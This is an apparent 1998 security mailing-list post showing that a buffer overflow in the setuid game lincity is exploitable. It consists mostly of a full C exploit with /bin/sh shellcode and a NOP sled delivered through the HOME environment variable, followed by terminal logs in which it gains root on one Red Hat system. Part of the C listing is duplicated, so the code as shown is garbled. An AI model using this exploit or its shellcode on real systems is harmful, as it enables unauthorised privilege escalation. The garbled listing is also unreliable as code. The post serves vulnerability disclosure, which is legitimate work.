Re: Lincity Buffer Overflow

bst@INAME.COM
Tue, 17 Mar 1998 10:12:44 -0400

In reply to TFreak answer:

I think IT IS dangerous. Observe:

First we present owr anfitrion:
--------------------------- lincityxpl.c ---------------------------------

#include <stdio.h>
#include <stdlib.h>

#define HOMESIZE 500
#define HUEVOSIZE 5000

char *shell =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

long
esp(void)
{
__asm__("movl %esp,%eax\n");
}
int
main(void)
{

char *ptr, *bof, *egg;
long *addr_ptr, addr;
int i;

if ( !(bof = malloc(HOMESIZE)) ) {
printf("NoMoreMemory4bof.\n");
exit(1);
}

if ( !(egg = malloc(HUEVOSIZE)) ) {
printf("NoMoreMemory4egg.\n");
exit(1);
}

long
esp(void)
{
__asm__("movl %esp,%eax\n");
}
int
main(void)
{

char *ptr, *bof, *egg;
long *addr_ptr, addr;
int i;

if ( !(bof = malloc(HOMESIZE)) ) {
printf("NoMoreMemory4bof.\n");
exit(1);
}

if ( !(egg = malloc(HUEVOSIZE)) ) {
printf("NoMoreMemory4egg.\n");
exit(1);
}

addr = esp();

addr_ptr = (long *) bof;
for (i = 0; i < HOMESIZE; i += 4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
*(ptr++) = 0x90;

for( i = 0; i < strlen(shell); i++)
*(ptr++) = shell[i];

printf("Address:\t0x%x\n", addr);

bof[HOMESIZE - 1] = '\0';
egg[HUEVOSIZE - 1] = '\0';

memcpy(bof, "BOF=", 4);
memcpy(egg , "EGG=", 4);

putenv(bof);
putenv(egg);

system("export HOME=$BOF; /usr/games/lincity");

}
-----------------------------------------------------------------------

System #1:
~~~~~~~~~~

$ cat /etc/redhat-release
release 4.1 (Vanderbilt)
$ uname -a
Linux System1 2.0.29 #3 Thu Jun 5 16:37:15 ARST 1997 i486
$ ls -la /usr/games/lincity
-rwsr-sr-x 1 root linux 793395 Mar 17 07:16 /usr/games/lincity
$ ldd /usr/games/lincity
libvgagl.so.1 => /usr/lib/libvgagl.so.1.2.10
libvga.so.1 => /usr/lib/libvga.so.1.2.10
libg++.so.27 => /usr/lib/libg++.so.27.1.4
libstdc++.so.27 => /usr/lib/libstdc++.so.27.1.4
libm.so.5 => /lib/libm.so.5.0.6
libc.so.5 => /lib/libc.so.5.3.12
$ cc -o fl lincityxpl.c
$ id
uid=500(bst) gid=500(bst) groups=500(bst)
$ ./fl
Address: 0xbffffd4c
bash# id
uid=500(bst) gid=500(bst) euid=0(root) egid=0(linux) groups=500(bst)
bash#

System #2:
~~~~~~~~~~

$ cat /etc/redhat-release
release 4.2 (Biltmore)
$ uname -a
Linux System2 2.0.33 #4 Thu Jan 15 08:49:37 GMT 1998 i586 unknown
$ ls -la /usr/games/lincity
-rwsr-sr-x 1 root root 794612 Mar 17 09:22 /usr/games/lincity
$ ldd /usr/games/lincity
libvgagl.so.1 => /usr/lib/libvgagl.so.1 (0x4000a000)
libvga.so.1 => /usr/lib/libvga.so.1 (0x40017000)
libg++.so.27 => /usr/lib/libg++.so.27 (0x40046000)
libstdc++.so.27 => /usr/lib/libstdc++.so.27 (0x40079000)
libm.so.5 => /lib/libm.so.5 (0x400a8000)
libc.so.5 => /lib/libc.so.5 (0x400b0000)
$ id
uid=501(rewt) gid=502(rewt) groups=100(users),502(rewt)
$ ls -la /usr/lib/libsvga*.so.*
-rwxr-xr-x 1 root bin 182356 Sep 2 1996 /usr/lib/libvga.so.1.2.10-rwxr-xr-x 1 root bin 46548 Sep 2 1996 /usr/lib/libvgagl.so.1.2.10
$ cc -o fl lincityxpl.c
$ id
uid=500(bst) gid=500(bst) groups=500(bst)
$ ./fl
Address: 0xbffffdd2f
sh-2.01$ id
uid=500(bst) gid=500(bst) groups=500(bst)

Well, as you can see, the *vga* libs are the same.
Please mail me with your conclutions.

Bst.